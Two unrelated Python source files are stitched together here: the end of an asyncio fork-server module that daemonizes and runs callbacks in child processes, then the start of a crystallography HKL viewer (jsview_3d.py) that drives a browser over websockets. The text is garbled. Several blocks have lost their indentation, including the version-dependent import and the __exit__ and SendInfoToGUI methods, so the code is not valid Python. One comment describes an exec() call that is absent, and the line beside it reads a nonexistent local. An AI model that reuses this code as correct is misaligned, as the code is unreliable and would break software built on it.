        daemon_options: must contain "working_directory", accepted by
            os.chdir (a dir fd here, per run())
    """
    os.chdir(daemon_options["working_directory"])
    # Make the process a process leader - signals sent to the parent group
    # will no longer propagate by default.
    os.setsid()
    # Secure umask by default.
    os.umask(0o077)
    # Reset signal handlers.
    # We omit SIGPIPE so the default Python signal handler correctly translates
    # it into an exception on socket write.
    for signum in settable_signals - {signal.SIGPIPE}:
        signal.signal(signum, signal.SIG_DFL)
    # Reset signal disposition.
    signal.pthread_sigmask(signal.SIG_SETMASK, set())
    # Redirect streams.
    # All three standard streams point at /dev/null so the daemon cannot
    # accidentally read from or write to the controlling terminal.
    devnull = os.open(os.devnull, os.O_RDWR)
    os.dup2(devnull, sys.stdin.fileno())
    os.dup2(devnull, sys.stdout.fileno())
    os.dup2(devnull, sys.stderr.fileno())
    target(detach)
def _run_server(
    callback, server_idle_timeout: Optional[float], user_data, done
) -> None:
    """Server that provides sockets to `callback`.

    Method must be invoked when cwd is suitable for secure creation of files.

    Args:
        callback: the callback function invoked on each request
        server_idle_timeout: timeout after which the server will stop
            automatically
        user_data: JSON-serializable object written into the server state file
        done: callback function invoked after setup and before we start handling
            requests
    """
    logger.debug("_run_server()")

    loop = asyncio.new_event_loop()

    def print_exception(_loop, context):
        # Custom loop exception handler: log the full traceback of any
        # exception that escapes a task instead of the default output.
        exc = context.get("exception")
        if exc:
            formatted_exc = "".join(
                traceback.format_exception(type(exc), exc, exc.__traceback__)
            )
        else:
            formatted_exc = "<no exception>"
        logger.error("Error in event loop: %r\n%s", context, formatted_exc)

    loop.set_exception_handler(print_exception)

    handler = ProcessConnectionHandler(callback, {}, loop=loop)

    def finish_loop():
        # Invoked via Server's on_shutdown: stop the loop, then drain any
        # still-pending tasks so nothing is cancelled mid-flight.
        logger.debug("Stopping loop")
        loop.stop()
        tasks = asyncio.all_tasks(loop)
        logger.debug("Number of pending tasks: %d", len(tasks))
        loop.run_until_complete(asyncio.gather(*tasks))
        logger.debug("Finished pending tasks")

    # socket_name is relative and we must already have cwd set to the
    # runtime_dir.
    server = Server(
        socket_name,
        stop_socket_name,
        handler,
        finish_loop,
        server_idle_timeout,
        loop=loop,
    )

    def handle_sigterm():
        # SIGTERM triggers the same graceful shutdown path as the stop socket.
        logger.debug("Received SIGTERM")
        loop.create_task(server.stop())

    loop.add_signal_handler(signal.SIGTERM, handle_sigterm)

    # Notify the parent that setup succeeded before we block in the loop.
    done()

    # For logging.
    multiprocessing.current_process().name = "server"

    # For server state info.
    pid = os.getpid()
    server_state = {
        "create_time": time.time(),
        "lib_version": __version__,
        "idle_timeout": server_idle_timeout,
        "pid": pid,
        "user_data": user_data,
        "groups": os.getgroups(),
        "gid": os.getgid(),
    }
    with open(server_state_name, "w", encoding="utf-8") as f:
        json.dump(server_state, f)

    logger.debug("Starting server")
    server.serve()
    # Runs until finish_loop() calls loop.stop() during shutdown.
    loop.run_forever()
    logger.debug("Server finished.")
class ConnectionHandler(ABC):
    """Interface used by `Server` to process accepted connections."""

    @abstractmethod
    async def handle_connection(self, connection: AsyncConnectionAdapter):
        # Handle a single accepted client connection until it is finished.
        pass

    @abstractmethod
    async def handle_shutdown(self):
        # Called once during server shutdown, after the listener is closed.
        pass
# Holds the current connection's fileno for the duration of its handling;
# presumably consumed by ContextLogger to tag log lines — confirm.
connection_id_var = contextvars.ContextVar("server_connection_id")
class ProcessConnectionHandler(ConnectionHandler):
    """Handles each client connection by launching the configured callback in
    a child process and relaying its pid and exit code over the connection."""

    def __init__(self, callback, context: Dict[str, str], loop=None):
        """
        Args:
            callback: function to be executed in child process
            context: server execution context, pretty much a user info object
            loop: event loop (defaults to asyncio.get_event_loop())
        """
        if not loop:
            loop = asyncio.get_event_loop()
        self._loop = loop
        self._callback = callback
        self._context = context
        self._start_time = time.time()
        self._pid = os.getpid()
        # Used by handle_shutdown to wait until all in-flight connections
        # have finished.
        self._connection_finish_cv = asyncio.Condition(loop=self._loop)
        self._num_active_connections = 0

    async def handle_connection(self, connection: AsyncConnectionAdapter):
        # Track in-flight connections so shutdown can drain them.
        self._num_active_connections += 1
        connection_id_var.set(connection.connection.fileno())
        logger.debug("Handling connection")
        try:
            await self._handle_connection(connection)
        except Exception:
            logger.exception("Unexpected exception handling connection")
            raise
        finally:
            logger.debug("Done with connection")
            self._num_active_connections -= 1
            # Wake anyone waiting in handle_shutdown.
            async with self._connection_finish_cv:
                self._connection_finish_cv.notify_all()

    async def _handle_connection(self, connection: AsyncConnectionAdapter):
        # noinspection PyTypeChecker
        process: AsyncProcess = None
        # noinspection PyTypeChecker
        process_task: asyncio.Task = None
        queue = asyncio.Queue()

        # Have 2 asynchronous tasks running in a loop:
        # - accept_request
        # - handle_request
        # accept_request waits on connection receive or error.
        #  on receipt, accept_request pushes to queue
        #  on error, accept_request cleans up and cancels the handler
        # handle_request always waits on the queue for requests and then handles
        # them as it is able
        async def handle_request():
            """Wait for and handle a single request."""
            nonlocal process, process_task
            logger.debug("Waiting for request")
            request = await queue.get()
            if request.name == RequestTypes.run_process:
                # First request: spawn the child and report its pid.
                assert process is None, "Process must not have been started"
                process_state = request.contents
                process = self._start_callback(process_state)
                process_task = asyncio.create_task(process.wait())
                pid = process.pid
                logger.debug("Running process in handler: %d", pid)
                await connection.send(Response(pid))
            elif request.name == RequestTypes.wait_process_done:
                # Second request: report the child's exit code when done.
                assert process is not None, "Process must have been started"
                logger.debug("Waiting for process to exit")
                # We don't want the process.wait() task to be cancelled in case
                # our connection gets broken.
                exitcode = await asyncio.shield(process_task)
                logger.debug("Result: %d", exitcode)
                await connection.send(Response(exitcode))
            return True

        async def accept_request():
            try:
                request: Request = await connection.recv()
            except ConnectionClose:
                logger.debug("Connection closed")
            except ConnectionResetError:
                logger.debug("Connection reset")
            else:
                # We dispatch asynchronously so we can always notice connection
                # reset quickly.
                queue.put_nowait(request)
                return True
            # This occurs when we have disconnected from the client so cancel
            # any pending responses and kill the child process.
            if process:
                logger.debug("Killing child process")
                try:
                    process.kill()
                except ProcessLookupError:
                    # No problem, process already exited.
                    pass
            logger.debug("Cancelling request handler")
            request_handler.cancel()
            # Falls through returning None (falsy), which stops the loop.

        async def loop(coro):
            # Repeat the coroutine until it signals completion by returning
            # a falsy value.
            while True:
                if not await coro():
                    break

        request_acceptor = asyncio.create_task(loop(accept_request))
        request_handler = asyncio.create_task(loop(handle_request))
        all_tasks = asyncio.gather(request_acceptor, request_handler)
        try:
            await all_tasks
        except asyncio.CancelledError:
            pass
        finally:
            logger.debug("Task cancelled or exception")
            all_tasks.cancel()

        if process_task:
            # Ensure the child is fully reaped before the connection handler
            # returns.
            logger.debug("Waiting for child process to exit")
            logger.debug("Process task: %s", process_task)
            await process_task

    def _start_callback(self, process_state) -> AsyncProcess:
        """Launch the configured callback in a new child process and return it."""
        def setup_child():
            # XXX: Should close open fds (except the one for the sentinel).
            ProcessState.apply_to_current_process(process_state)
            try:
                sys.exit(self._callback())
            except SystemExit as e:
                # multiprocessing sets exitcode to 1 if `sys.exit` is called
                # with `None` or no arguments, so we re-map it here.
                # See https://bugs.python.org/issue35727.
                if e.code is None:
                    e.args = (0,)
                    e.code = 0
                raise

        process = AsyncProcess(target=setup_child, loop=self._loop)
        process.start()
        return process

    async def handle_shutdown(self):
        """Shutdown executor"""
        logger.debug("Waiting for all connection handling to be done")
        # Wait for handling of all connections to be done.
        async with self._connection_finish_cv:
            await self._connection_finish_cv.wait_for(
                lambda: not self._num_active_connections
            )
class Server:
    """A multiprocessing.Connection server accepts new connections and dispatches handling of requests to
    the AsyncProcessExecutor.

    Per https://bugs.python.org/issue21998 asyncio is not fork-safe, so we spawn
    an executor prior to the starting of the event loop which has essentially
    the state that existed after the call to the cli factory.

    Not thread-safe.
    """

    def __init__(
        self,
        socket_path,
        stop_socket_path,
        handler: ConnectionHandler,
        on_shutdown: NoneFunction,
        idle_timeout: Optional[int] = None,
        shutdown_ctx=None,
        loop=None,
    ):
        """
        Args:
            socket_path: path to listen for client connections
            stop_socket_path: path to a socket which, when a client connects,
                will cause the server to shut down
            handler: Handler for received connections
            on_shutdown: callback invoked after graceful shutdown has finished
            idle_timeout: timeout (in seconds) after which server will shut itself down
                without any work
            shutdown_ctx: Context manager to be entered prior to server shutdown.
            loop: event loop (defaults to asyncio.get_event_loop())
        """
        if not loop:
            loop = asyncio.get_event_loop()
        self._loop = loop
        self._stop_socket_path = stop_socket_path
        self._listener = AsyncListener(socket_path, loop=self._loop)
        self._handler = handler
        self._idle_timeout = idle_timeout
        # DeadlineTimer armed only while there are zero active connections.
        self._idle_timer = None
        self._shutdown_ctx = shutdown_ctx
        self._num_active_connections = 0
        self._shutting_down = False
        # Notified by _serve_clients when the listener has stopped, so stop()
        # knows no more connections will be queued.
        self._shutdown_accept_cv = asyncio.Condition(loop=self._loop)
        self._on_shutdown = on_shutdown

    def serve(self):
        # Start accepting on both the stop socket and the client socket.
        self._loop.create_task(self._serve_stop())
        self._loop.create_task(self._serve_clients())

    async def stop(self):
        """Gracefully stop server, processing all pending connections.
        """
        # Do server shutdown and pending event handling first.
        # Server shutdown should ensure:
        # 1. No accepted connections are unhandled
        # 2. All pending asynchronous functions have returned
        # 3. All cleanup by the handler is done.
        logger.debug("Server.stop()")
        self._shutting_down = True
        with ExitStack() as stack:
            if self._shutdown_ctx:
                stack.enter_context(self._shutdown_ctx)
            # Prevent timeout from occurring while we're shutting down.
            self._clear_idle_timer()
            # Closing the listener ensures there will be no more connections
            # queued.
            logger.debug("Waiting for listener close")
            await self._listener.close()
            logger.debug("Waiting for pending connections")
            # NOTE(review): if _serve_clients notifies before we start
            # waiting here, this wait() could miss the notification —
            # confirm the ordering guarantees of AsyncListener.close().
            async with self._shutdown_accept_cv:
                await self._shutdown_accept_cv.wait()
            logger.debug("Waiting for handler shutdown")
            await self._handler.handle_shutdown()
            logger.debug("Waiting for shutdown callback")
            # Finish everything off.
            self._on_shutdown()

    async def _serve_stop(self):
        # Dedicated Unix socket: any client connecting to it triggers stop().
        sock = self._stop_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
        sock.bind(self._stop_socket_path)
        sock.listen(1)
        sock.setblocking(False)
        self._loop.add_reader(sock.fileno(), self._on_stop_connect)

    def _on_stop_connect(self):
        # One-shot: a single connection is enough to initiate shutdown.
        self._loop.remove_reader(self._stop_sock.fileno())
        _sock, _address = self._stop_sock.accept()
        # XXX: Should we close the socket?
        self._loop.create_task(self.stop())

    async def _serve_clients(self):
        # Accept loop; exits when the listener stops (normally at shutdown).
        while True:
            try:
                connection = await self._listener.accept()
            except ListenerStopped:
                if not self._shutting_down:
                    logger.error("Listener has stopped")
                else:
                    # Tell stop() that no further connections will arrive.
                    async with self._shutdown_accept_cv:
                        self._shutdown_accept_cv.notify()
                return
            else:
                self._handle_connection(connection)

    def _handle_connection(self, connection: AsyncConnectionAdapter):
        self._idle_handle_connect()

        async def wait_closed():
            # Re-arm the idle timer once this connection goes away.
            await connection.closed()
            self._idle_handle_close()

        self._loop.create_task(wait_closed())
        self._loop.create_task(self._handler.handle_connection(connection))

    def _handle_timeout(self):
        # Idle deadline reached with no active connections: shut down.
        self._loop.create_task(self.stop())

    def _set_idle_timer(self):
        # No-op while shutting down, when idle shutdown is disabled, or when
        # a timer is already pending.
        if self._shutting_down:
            return
        if self._idle_timeout is None:
            return
        if self._idle_timer is not None:
            return
        self._idle_timer = DeadlineTimer(self._handle_timeout, self._loop)
        self._idle_timer.expires_from_now(self._idle_timeout)

    def _clear_idle_timer(self):
        if self._idle_timeout is None:
            return
        if self._idle_timer is None:
            return
        self._idle_timer.cancel()
        self._idle_timer = None

    def _idle_handle_connect(self):
        # Any active connection keeps the server alive.
        self._num_active_connections += 1
        self._clear_idle_timer()

    def _idle_handle_close(self):
        self._num_active_connections -= 1
        if not self._num_active_connections:
            self._set_idle_timer()
|
jsview_3d.py |
from __future__ import absolute_import, division, print_function
from libtbx.math_utils import roundoff
import traceback
from cctbx.miller import display2 as display
from cctbx.array_family import flex
from cctbx import miller
from crys3d.hklview import HKLJavaScripts
from scitbx import graphics_utils
from scitbx import matrix
import scitbx.math
from libtbx.utils import Sorry, to_str
import threading, math, sys, cmath
if sys.version_info[0] > 2: # using websockets which is superior to websocket_server
from crys3d.hklview.WebBrowserMessengerPy3 import WBmessenger
else: # using websocket_server
from crys3d.hklview.WebBrowserMessengerPy2 import WBmessenger
from time import sleep
import os.path, time, copy
import libtbx
import webbrowser, tempfile
from six.moves import range
def has_phil_path(philobj, *paths): # variable number of arguments
  """Return True when any name in *paths* matches a dot-separated component
  of the path of some definition in *philobj*."""
  for wanted in paths:
    matches = [d for d in philobj.all_definitions() if wanted in d.path.split(".")]
    if matches:
      return True
  return False
class ArrayInfo:
  """Summary statistics (data/sigma min-max, span, resolution range, symmetry
  flags) and labels for a miller array, for display in the HKL viewer."""
  def __init__(self, millarr, mprint=sys.stdout.write, fomlabel=None):
    from iotbx.gui_tools.reflections import get_array_description
    if (millarr.unit_cell() is None) or (millarr.space_group() is None) :
      raise Sorry("No space group info is present in data")
    data = millarr.data()
    self.datatype = ""
    if (isinstance(data, flex.int)):
      # drop the sentinel value used for missing integers before min/max
      data = flex.double([e for e in data if e!= display.inanval])
      self.datatype = "isint"
    if millarr.is_complex_array():
      # statistics of complex data are taken on the amplitudes
      data = flex.abs(millarr.data())
      self.datatype = "iscomplex"
    #data = [e for e in data if not math.isnan(e)]
    data = graphics_utils.NoNansArray( data, data[0] ) # assuming data[0] isn't NaN
    self.maxdata = flex.max( data )
    self.mindata = flex.min( data )
    self.maxsigmas = self.minsigmas = None
    if millarr.sigmas() is not None:
      data = millarr.sigmas()
      self.datatype = "hassigmas"
      #data = [e for e in data if not math.isnan(e)]
      data = graphics_utils.NoNansArray( data, data[0] ) # assuming data[0] isn't NaN
      self.maxsigmas = flex.max( data )
      self.minsigmas = flex.min( data )
    self.minmaxdata = (roundoff(self.mindata), roundoff(self.maxdata))
    # NOTE(review): roundoff is applied to min/max sigmas even when sigmas are
    # absent (None) — presumably roundoff tolerates None; confirm.
    self.minmaxsigs = (roundoff(self.minsigmas), roundoff(self.maxsigmas))
    self.labels = self.desc = ""
    #import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
    if millarr.info():
      #self.labels = millarr.info().label_string()
      self.labels = millarr.info().labels
      if fomlabel:
        # map coefficients combined with a figure-of-merit array get a merged label
        self.labels = [ millarr.info().label_string() + " + " + fomlabel ]
        self.datatype = "iscomplex_fom"
      self.desc = get_array_description(millarr)
    self.span = ("?" , "?")
    self.spginf = millarr.space_group_info().symbol_and_number()
    dmin = 0.0
    dmax = 0.0
    try:
      self.span = ( millarr.index_span().min(), millarr.index_span().max())
      dmin = millarr.d_max_min()[1]
      dmax = millarr.d_max_min()[0]
    except Exception as e:
      # best effort: some arrays cannot report their span/resolution
      mprint(to_str(e))
    issymunique = millarr.is_unique_set_under_symmetry()
    isanomalous = millarr.anomalous_flag()
    # tuple consumed by GUI table rows; infostr is its human-readable form
    self.infotpl = ( ",".join(self.labels), self.desc, self.spginf, millarr.indices().size(), self.span,
     self.minmaxdata, self.minmaxsigs, (roundoff(dmin), roundoff(dmax)), issymunique, isanomalous )
    self.infostr = "%s (%s), space group: %s, %s HKLs: %s, MinMax: %s, MinMaxSigs: %s, d_minmax: %s, SymUnique: %d, Anomalous: %d" %self.infotpl
def MakeHKLscene( proc_array, pidx, setts, mapcoef_fom_dict, merge, mprint=sys.stdout.write):
  """Create display.scene objects for a processed miller array — one scene for
  the array itself plus one per associated figure-of-merit array — and collect
  per-scene min/max statistics.

  Returns:
    (hklscenes, scenemaxdata, scenemindata, scenemaxsigmas, sceneminsigmas,
     scenearrayinfos)
  """
  scenemaxdata =[]
  scenemindata =[]
  scenemaxsigmas = []
  sceneminsigmas = []
  scenearrayinfos = []
  hklscenes = []
  fomsarrays_idx = [(None, None)]
  #mprint("in MakeHKLscene", verbose=True)
  #import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
  if proc_array.is_complex_array():
    # NOTE(review): .get() returns None when the label is missing, which
    # would make extend() raise — presumably the dict always has the key;
    # confirm against the caller that builds mapcoef_fom_dict.
    fomsarrays_idx.extend( mapcoef_fom_dict.get(proc_array.info().label_string()) )
  # NOTE(review): settings aliases setts (deepcopy is commented out below),
  # so clearing the expand_* flags here mutates the caller's object.
  settings = setts
  if (settings.expand_anomalous or settings.expand_to_p1) \
      and not proc_array.is_unique_set_under_symmetry() and not merge:
    #settings = copy.deepcopy(settings)
    settings.expand_anomalous = False
    settings.expand_to_p1 = False
    mprint("The " + proc_array.info().label_string() + \
        " array is not symmetry unique and therefore won't be expanded")
  if (settings.inbrowser==True):
    # expansion is deferred to the browser-side javascript
    settings.expand_anomalous = False
    settings.expand_to_p1 = False
  for (fomsarray, fidx) in fomsarrays_idx:
    hklscene = display.scene(miller_array=proc_array, merge=merge,
      settings=settings, foms_array=fomsarray, fullprocessarray=True )
    if not hklscene.SceneCreated:
      mprint("The " + proc_array.info().label_string() + " array was not processed")
      #return False
      continue
    #import code, traceback; code.interact(local=locals(), banner="".join( traceback.format_stack(limit=10) ) )
    # cast any NAN values to 1 of the colours and radii to 0.2 before writing javascript
    if hklscene.SceneCreated:
      hklscenes.append( hklscene)
      #b = flex.bool([math.isnan(e[0] + e[1] + e[2]) for e in hklscene.colors])
      #hklscene.colors = hklscene.colors.set_selected(b, (1.0, 1.0, 1.0))
      hklscene.colors = graphics_utils.NoNansvec3( hklscene.colors, 1.0, 1.0, 1.0)
      #b = flex.bool([math.isnan(e) for e in hklscene.radii])
      #hklscene.radii = hklscene.radii.set_selected(b, 0.2)
      hklscene.radii = graphics_utils.NoNansArray( hklscene.radii, 0.2)
      fomslabel = None
      if fomsarray:
        fomslabel = fomsarray.info().label_string()
      ainf = ArrayInfo(hklscene.work_array, fomlabel=fomslabel)
      scenemaxdata.append( ainf.maxdata )
      scenemindata.append( ainf.mindata )
      scenemaxsigmas.append(ainf.maxsigmas)
      sceneminsigmas.append(ainf.minsigmas)
      scenearrayinfos.append([ainf.infostr, pidx, fidx, ainf.labels, ainf.datatype])
      #self.mprint("%d, %s" %(i, infostr) )
      #i +=1
  return (hklscenes, scenemaxdata, scenemindata, scenemaxsigmas, sceneminsigmas, scenearrayinfos)
def MakeTtips(hklscene, j):
  """Build tooltip strings for every reflection in hklscene plus a javascript
  alias declaration for the scene's column label.

  hklscene: a display.scene object wrapping a miller array.
  j: running scene number; used to name the javascript alias st<j>.
  Returns (tooltipstringsdict, colstraliases): tooltipstringsdict maps each
  miller index to a partially javascript-escaped tooltip string; colstraliases
  is the javascript variable declaration for this scene's label.
  """
  tooltipstringsdict = {}
  colstraliases = ""
  if hklscene.isUsingFOMs():
    return tooltipstringsdict, colstraliases # already have tooltips for the scene without the associated fom
  # st<j> expands in javascript to a newline followed by this scene's column label
  colstraliases += "\n    var st%d = '\\n%s: '" %(j, hklscene.work_array.info().label_string() )
  # NOTE(review): ocolstr is assigned but never used in this function
  ocolstr = hklscene.work_array.info().label_string()
  if hklscene.work_array.is_complex_array():
    # complex data are shown as (amplitude, phase-in-degrees) pairs
    ampl = flex.abs(hklscene.data)
    phases = flex.arg(hklscene.data) * 180.0/math.pi
    # purge nan values from array to avoid crash in fmod_positive()
    #b = flex.bool([bool(math.isnan(e)) for e in phases])
    # replace the nan values with an arbitrary float value
    #phases = phases.set_selected(b, 42.4242)
    phases = graphics_utils.NoNansArray( phases, 42.4242)
    # Cast negative degrees to equivalent positive degrees
    phases = flex.fmod_positive(phases, 360.0)
  sigmas = hklscene.sigmas
  for i,datval in enumerate(hklscene.data):
    od =""
    if hklscene.work_array.is_complex_array():
      # DGR is a javascript alias for the degree character
      od = str(roundoff(ampl[i], 2)) + ", " + str(roundoff(phases[i], 1)) + \
        "\'+DGR+\'"
    elif sigmas is not None:
      od = str(roundoff(datval, 2)) + ", " + str(roundoff(sigmas[i], 2))
    else:
      od = str(roundoff(datval, 2))
    # skip NaN values and the sentinel used by display for absent reflections
    if not (math.isnan( abs(datval) ) or datval == display.inanval):
      hkl = hklscene.indices[i]
      if not hkl in tooltipstringsdict:
        spbufttip = '\'+hk+\'%s, %s, %s' %(hkl[0], hkl[1], hkl[2])
        # NOTE(review): '\ndres' here is a literal newline whereas
        # GetTooltipOnTheFly emits the two-character sequence '\\n' for
        # javascript — confirm which one the consumer expects
        spbufttip += '\ndres: %s ' %str(roundoff(hklscene.dres[i], 2) )
        spbufttip += '\'+AA+\'' # javascript alias for angstrom
        tooltipstringsdict[hkl] = spbufttip
      # st1, st2,... are javascript aliases for miller array labelstrings as declared in colstraliases
      tooltipstringsdict[hkl] += '\'+st%d+\'%s' %(j, od)
  return tooltipstringsdict, colstraliases
class hklview_3d:
  def __init__ (self, *args, **kwds) :
    """Initialise all viewer state and start the websocket messenger.

    Recognised kwds (all optional): settings, high_quality, parent, verbose,
    debug, mprint, websockport, htmlfname, jscriptfname, send_info_to_gui,
    UseOSBrowser, handshakewait.
    """
    # phil settings double as the viewer parameters below
    self.settings = kwds.get("settings")
    self.ngl_settings = None #NGLsettings()
    self.viewerparams = kwds.get("settings")
    self.diff_phil = None
    self.params = None
    self.miller_array = None
    self.symops = []
    self.sg = None
    self.tooltipstrings = []
    self.tooltipstringsdict = {}
    self.d_min = None
    self.scene = None
    self.lastscene_id = None
    self.merge = False
    self.NGLscriptstr = ""
    self.camera_type = "orthographic"
    self.primitivetype = "SphereBuffer"
    self.url = ""
    self.bin_labels_type_idx = ("Resolution", "", -1, -1)
    self.colour_scene_id = None
    self.radii_scene_id = None
    #self.scene_id = None
    #self.rotation_mx = matrix.identity(3)
    self.rot_recip_zvec = None
    self.rot_zvec = None
    self.meanradius = -1
    self.past = time.time()
    self.orientmessage = None
    self.high_quality = True
    if 'high_quality' in kwds:
      self.high_quality = kwds['high_quality']
    # camera / clip-plane state filled in later by the browser handshake
    self.clipNear = None
    self.clipFar = None
    self.cameraPosZ = None
    self.boundingX = None
    self.boundingY = None
    self.boundingZ = None
    self.OrigClipNear = None
    self.OrigClipFar = None
    self.cameratranslation = ( 0,0,0 )
    #self.angle_x_svec = 0.0
    #self.angle_y_svec = 0.0
    self.angle_z_svec = 0.0
    #self.angle_z_yzvec = 0.0
    #self.angle_y_yzvec = 0.0
    #self.angle_y_xyvec = 0.0
    self.angle_x_xyvec = 0.0
    self.vecrotmx = None
    # reciprocal/real space axes and plane normals, set by DrawNGLJavaScript
    self.unit_h_axis = None
    self.unit_k_axis = None
    self.unit_l_axis = None
    self.normal_hk = None
    self.normal_kl = None
    self.normal_lh = None
    self.isnewfile = False
    self.has_new_miller_array = False
    self.sleeptime = 0.025
    self.colstraliases = ""
    self.binvals = []
    self.binvalsboundaries = []
    self.oldnbinvalsboundaries = None
    # per-array scene caches and bookkeeping
    self.proc_arrays = []
    self.HKLscene = []
    self.HKLscenes = []
    self.HKLscenedict = {}
    self.HKLscenesdict = {}
    self.HKLscenesMaxdata = []
    self.HKLscenesMindata = []
    self.HKLscenesMaxsigmas = []
    self.HKLscenesMinsigmas = []
    self.bindata = None
    self.reciproc_scale = 1.0
    self.realspace_scale = 1.0
    self.sceneisdirty = True
    self.imagename = None
    self.imgdatastr = ""
    self.hkl_scenes_info = []
    self.match_valarrays = []
    self.array_infostrs = []
    self.array_infotpls = []
    self.binstrs = []
    self.nuniqueval = 0
    self.bin_infotpls = []
    self.mapcoef_fom_dict = {}
    self.sceneid_from_arrayid = []
    self.parent = None
    if 'parent' in kwds:
      self.parent = kwds['parent']
    self.verbose = 0
    if 'verbose' in kwds:
      # NOTE(review): eval() of a caller-supplied string — assumes the kwd
      # comes from a trusted command line; confirm callers never pass
      # untrusted input here
      self.verbose = eval(kwds['verbose'])
    self.debug = None
    if 'debug' in kwds:
      self.debug = kwds['debug']
    self.mprint = sys.stdout.write
    if 'mprint' in kwds:
      self.mprint = kwds['mprint']
    self.nbinvalsboundaries = 0
    self.websockport = 7894
    if 'websockport' in kwds:
      self.websockport = kwds['websockport']
    tempdir = tempfile.gettempdir()
    # ensure unique file name by including port number in filename
    self.hklfname = os.path.join(tempdir, "hkl_%d.htm" %self.websockport )
    if os.path.isfile(self.hklfname):
      os.remove(self.hklfname)
    if 'htmlfname' in kwds and kwds['htmlfname']:
      self.hklfname = kwds['htmlfname']
    self.hklfname = os.path.abspath( self.hklfname )
    self.jscriptfname = os.path.join(tempdir, "hkljstr_%d.js" %self.websockport)
    if os.path.isfile(self.jscriptfname):
      os.remove(self.jscriptfname)
    if 'jscriptfname' in kwds and kwds['jscriptfname'] != "":
      self.jscriptfname = kwds['jscriptfname']
    self.send_info_to_gui = None
    if 'send_info_to_gui' in kwds:
      self.send_info_to_gui = kwds['send_info_to_gui']
    self.mprint('Output will be written to \"%s\"\n' \
      'rendering WebGL with JavaScript in \"%s\"' %(self.hklfname, self.jscriptfname))
    # html scaffold; the two %s slots receive the NGL library and our script
    self.hklhtml = r"""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<meta charset="utf-8" />
</head>
<body>
<script src="%s" type="text/javascript"></script>
<script src="%s" type="text/javascript"></script>
"""
    self.htmldiv = """
<div id="viewport" style="width:100%; height:100%;"></div>
</body></html>
"""
    self.colourgradientvalues = []
    self.isinjected = False
    self.UseOSBrowser = ""
    ldic=locals()
    if 'UseOSBrowser' in kwds:
      # NOTE(review): exec() used merely to copy a kwd into a local dict —
      # presumably a workaround for an old python 2 scoping issue; verify
      self.UseOSBrowser = ldic["UseOSBrowser"]
    self.viewmtrx = None
    self.lastviewmtrx = None
    self.currentRotmx = matrix.identity(3)
    self.HKLsceneKey = ( 0, False, self.viewerparams.expand_anomalous, self.viewerparams.expand_to_p1 )
    self.handshakewait = 5
    if 'handshakewait' in kwds:
      # NOTE(review): eval() of a caller-supplied string — see 'verbose' above
      self.handshakewait = eval(kwds['handshakewait'])
    self.lastmsg = "" # "Ready"
    # websocket messenger drives all communication with the browser
    self.WBmessenger = WBmessenger(self)
    self.AddToBrowserMsgQueue = self.WBmessenger.AddToBrowserMsgQueue
    self.WBmessenger.StartWebsocket()
    self.javascriptcleaned = False
def __exit__(self, exc_type, exc_value, traceback):
# not called unless instantiated with a "with hklview_3d ... " statement
self.JavaScriptCleanUp()
nwait = 0
while not self.WBmessenger.isterminating and nwait < 5:
#sleep(self.sleeptime)
self.WBmessenger.Sleep(self.sleeptime)
nwait += self.sleeptime
if os.path.isfile(self.hklfname):
os.remove(self.hklfname)
if os.path.isfile(self.jscriptfname):
os.remove(self.jscriptfname)
self.mprint("Destroying hklview_3d", 1)
def SendInfoToGUI(self, mydict):
if self.send_info_to_gui:
self.send_info_to_gui( mydict )
  def update_settings(self, diff_phil, curphilparam) :
    """Apply a changed phil parameter set to the viewer.

    diff_phil: phil object holding only the parameters that changed.
    curphilparam: the full current phil parameter set; also returned.
    Rebuilds the HKL scenes, bin thresholds and javascript as dictated by
    which parameters appear in diff_phil.
    """
    self.ngl_settings = curphilparam.viewer.NGL
    self.viewerparams = curphilparam.viewer
    self.params = curphilparam
    self.diff_phil = diff_phil
    # NOTE(review): python precedence makes this condition
    # A or (B and C) or (D and E) — confirm that grouping is intended
    if has_phil_path(diff_phil,
                     "openfilename",
                     "spacegroup_choice",
                     "using_space_subgroup",
                     "merge_data",
                     "camera_type",
                     "miller_array_operations",
                     ) \
     or has_phil_path(diff_phil, "viewer") \
     and has_phil_path(diff_phil,
                       "show_data_over_sigma",
                       "show_missing",
                       "show_only_missing",
                       "show_systematic_absences",
                       "slice_axis",
                       "slice_mode",
                       "slice_index",
                       "sigma_color",
                       "sigma_radius",
                       "fontsize",
                       "scene_id",
                       "scale",
                       "nth_power_scale_radii"
                       ) \
     or self.viewerparams.inbrowser==False and \
      ( has_phil_path(diff_phil,
                      "expand_anomalous",
                      "expand_to_p1",
                      "show_anomalous_pairs")
      ):
      self.sceneisdirty = True
      if has_phil_path(diff_phil, "scene_id",
                       "scale",
                       "nth_power_scale_radii"
                       ):
        self.ConstructReciprocalSpace(curphilparam, scene_id=self.viewerparams.scene_id )
      else:
        self.ConstructReciprocalSpace(curphilparam )
    # NOTE(review): msg is assigned but never used in this method
    msg = ""
    if self.viewerparams.scene_id is not None and \
      ( has_phil_path(diff_phil,
                      "show_missing",
                      "show_only_missing",
                      "show_systematic_absences",
                      "scene_bin_thresholds",
                      "bin_labels_type_idx",
                      "nbins"
                      )
      ):
      self.binvals, self.nuniqueval = self.calc_bin_thresholds(curphilparam.bin_labels_type_idx, curphilparam.nbins)
      self.sceneisdirty = True
    if has_phil_path(diff_phil, "camera_type"):
      self.set_camera_type()
    if has_phil_path(diff_phil, "miller_array_operations"):
      # a newly created miller array becomes the last scene; select it
      self.viewerparams.scene_id = len(self.HKLscenedict)-1
      self.set_scene(self.viewerparams.scene_id)
      self.params.miller_array_operations = ""
    if self.viewerparams.scene_id is not None:
      if not self.isinjected:
        self.scene = self.HKLscene_from_dict(self.viewerparams.scene_id)
      self.DrawNGLJavaScript()
      self.mprint( "Rendered %d reflections" % self.scene.points.size(), verbose=1)
      self.set_volatile_params()
    return curphilparam
  def set_volatile_params(self):
    """Apply the parameters that can be changed without recomputing scenes:
    orientation lock, mouse speed, clip plane / slicing, browser-side P1 and
    Friedel expansion, bin opacities, unit cell drawings and tooltips.
    """
    if self.viewerparams.scene_id is not None:
      if has_phil_path(self.diff_phil, "angle_around_vector"): # no need to redraw any clip plane
        return
      self.fix_orientation(self.viewerparams.NGL.fixorientation)
      self.SetMouseSpeed(self.viewerparams.NGL.mouse_sensitivity)
      R = flex.vec3_double( [(0,0,0)])
      hkldist = -1
